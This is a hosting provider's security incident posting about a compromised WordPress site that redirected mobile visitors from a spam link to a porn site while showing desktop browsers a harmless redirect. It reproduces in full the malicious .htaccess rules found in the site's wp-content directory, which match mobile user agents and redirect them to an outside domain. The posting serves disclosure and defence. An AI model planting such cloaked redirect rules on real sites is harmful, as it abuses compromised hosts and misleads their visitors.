Hi, Yesterday we received numerous abuse reports regarding a web site hosted at BitFolk being mentioned in an email spam run. The spam email looked like this: http://pastie.org/private/vjxjhjkpfxqby0fkrv87oq (http://[elided]/wp-content/themes/mantra/uploads/wps.php?v20120226 being the link that was hosted at BitFolk) The link, when visited from a conventional browser, was a harmless redirect to microsoft.com, however when visited from a mobile browser redirected to a porn site. The customer was contacted and their port 80 immediately firewalled off. Later the customer advised that they were unwilling to spend the time to discover exactly how Wordpress had been compromised, preferring instead to completely remove it. The following .htaccess file was found in several places throughout the wp-content directory: RewriteEngine On RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR] RewriteCond %{HTTP_USER_AGENT} ^.*(Alcatel|Asus|Android|BlackBerry|Ericsson|Fly|Huawei|i-mate|iPAQ|iPhone|iPod|LG-|LGE-|MDS_|MOT-|Nokia|Palm|Panasonic|Pantech|Philips|Sagem|Samsung|Sharp|SIE-|Symbian|Vodafone|Voxtel|WebOS|Windows\s+CE|ZTE-|Zune).*$ [NC,OR] RewriteCond %{HTTP_ACCEPT} application/vnd.wap.xhtml\+xml [NC,OR] RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC] RewriteRule ^(.*) http://crzyluxtds.in/go.php?sid=1 [L,R=302] The customer says that no plugins were installed, so it must have been a base Wordpress install that was compromised (may have been out of date or installed incorrectly). Cheers, Andy About this email: https://tools.bitfolk.com/wiki/Security_incident_postings -- http://bitfolk.com/ -- No-nonsense VPS hosting